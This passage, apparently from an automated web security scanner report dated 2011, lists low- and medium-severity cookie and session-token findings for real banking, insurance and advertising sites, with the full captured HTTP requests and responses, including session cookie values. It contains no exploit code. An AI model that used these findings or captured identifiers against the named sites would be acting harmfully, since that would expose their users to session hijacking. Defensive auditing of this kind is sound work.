GET /virtualMedia/img3094.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 19053
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 12:26:29 GMT
Accept-Ranges: bytes
ETag: "f09e7aaa686cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...
5.89. https://www.regions.com/virtualMedia/img3107.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3107.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3107.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6714
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:10 GMT
Accept-Ranges: bytes
ETag: "a0d87c3aa66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
5.90. https://www.regions.com/virtualMedia/img3108.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3108.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img3108.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 6824
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:23 GMT
Accept-Ranges: bytes
ETag: "60eb1a42a66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:23 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
5.91. https://www.regions.com/virtualMedia/img3132.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3132.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3132.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 7184
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:55:25 GMT
Accept-Ranges: bytes
ETag: "80abd2d38cacc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...
5.92. https://www.regions.com/virtualMedia/img506.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img506.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img506.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555468317:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 4606
Content-Type: image/gif
Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT
Accept-Ranges: bytes
ETag: "5032cc56e0c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:09 GMT

GIF89a..<.........(...f..T..........Ir.&..K............Y........T...................y..i................................W...........`.............................................[........O..........    .
...[SNIP]...
6. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

6.1. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.placelocal.com%2F&callback=_xdc_._4yo50g&token=45097 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:36 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._4yo50g && _xdc_._4yo50g( [1] )
6.2. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d42.298510953956395&2d-71.34532860534671&2m2&1d42.41876265372929&2d-70.76803139465335&2u13&4sen-US&5e0&callback=_xdc_._7hwynl&token=51217 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:39 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2789

_xdc_._7hwynl && _xdc_._7hwynl( ["Map data ..2011 Google",[["street_view",[[42.40723466155187,-71.3671875],[42.42345651793831,-70.9716796875]]],["street_view",[[42.40723466155187,-70.94970703125],[42.
...[SNIP]...
6.3. http://mt1.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt1.googleapis.com
Path:   /mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cs.t%3A33%7Cp.v%3Aoff%7Cos%3A361922046&las=twtuwwuvuvwtu,twtuwwuvuvwtw,twtuwwuvuvwut,twtuwwuvuvwuv,twtuwwuvuvwvu,twtuwwuvuvwvw,twtuwwuvuvwwt,twtuwwuvuvwwv,twtuwwuvwtutu,twtuwwuvwtutw,twtuwwuvwtuut,twtuwwuvwtuuv&z=13&src=apiv3&xc=1&apistyle=s.t:33|p.v:off&callback=_xdc_._ap21jg&token=99274 HTTP/1.1
Host: mt1.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:15:41 GMT
Expires: Mon, 16 May 2011 16:15:41 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 585

_xdc_._ap21jg && _xdc_._ap21jg([{id:"twtuwwuvuvwtu",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwtw",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwut",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwuv",zrange:[13
...[SNIP]...
7. Cookie scoped to parent domain  previous  next
There are 21 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

7.1. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Set-Cookie: PHPSESSID=3oik1g2sp46e2tucskv23ggv70; expires=Thu, 03-Oct-2052 06:39:20 GMT; path=/; domain=.placelocal.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Vary: Accept-Encoding
Content-Length: 6267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
7.2. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dd159eaa044675c&callback=_ate.ad.hrr&pub=xa-4cd989666c0edf81&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.xsnet.com%2F&11g3bcg HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305283016.60|1305283016.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 16 May 2011 17:08:13 GMT
Set-Cookie: di=1305283016.1FE|1305283016.60; Domain=.addthis.com; Expires=Wed, 15-May-2013 17:08:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 16 May 2011 17:08:12 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
7.3. http://id.google.com/verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=paperg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=47=IcQivqrsQQyyODzSZ3jSjP-k_5NKyAJcx7JYMTwH=eIcQYTf9W4Lifywd; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=KItN1BTtwQNNlX1ALe1vDC7hoepoKX2UQICiquxtJyGvPpXkRhOP0VSYRncKH-Ip7WUjGpM92yvv3kjAfNGRUaBZTHmZpQy4UvWTLU1BWRwGdARXc--dGj_5qPLGEDEK

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=9MV86JLCC9GhPUGzFymZgXLFqBtY6r3FawvJxe4h=3m4WhDM2VDf0DHRF; expires=Tue, 15-Nov-2011 16:24:02 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 16 May 2011 16:24:02 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
7.4. http://id.google.com/verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=flyerboard+code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=rmeNxjSpRiyowfuoPnPrfvCYPboGatm2egPZvsyJ6Q=PgdRYtYWovfexK6y; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=GlnzvSoFIw0VYMuzw1RX2G3KdegCONCncSo6MH7FlQ=vlCmjtwI5b9-3KjA; expires=Tue, 15-Nov-2011 14:45:16 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 16 May 2011 14:45:16 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;
7.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
7.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
7.7. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...
7.8. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
